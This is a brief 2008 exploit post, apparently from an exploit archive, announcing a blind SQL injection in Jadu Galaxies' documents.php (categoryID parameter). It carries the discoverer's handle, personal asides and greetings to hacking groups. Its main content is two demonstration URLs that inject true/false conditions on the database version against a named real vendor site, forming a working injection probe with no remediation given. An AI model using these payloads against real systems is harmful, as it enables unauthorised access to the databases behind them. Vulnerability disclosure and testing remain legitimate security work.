Jadu Galaxies suffers from a blind SQL injection vulnerability.
0190750d8c448e0a6821c98c4831651c106df26024ce32a31d15a61590c8c5ee
[~] powered by Jadu® Galaxies blind sql inj
[~]
[~] documents.php (categoryID) blind sql inj
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 17.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 45
[~]
[~] my target bug number: 100
[~]
[~] N0T: a.q bide kpss calIscaktIm : ( (
[~]
[~] -----------------------------------------------------------
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------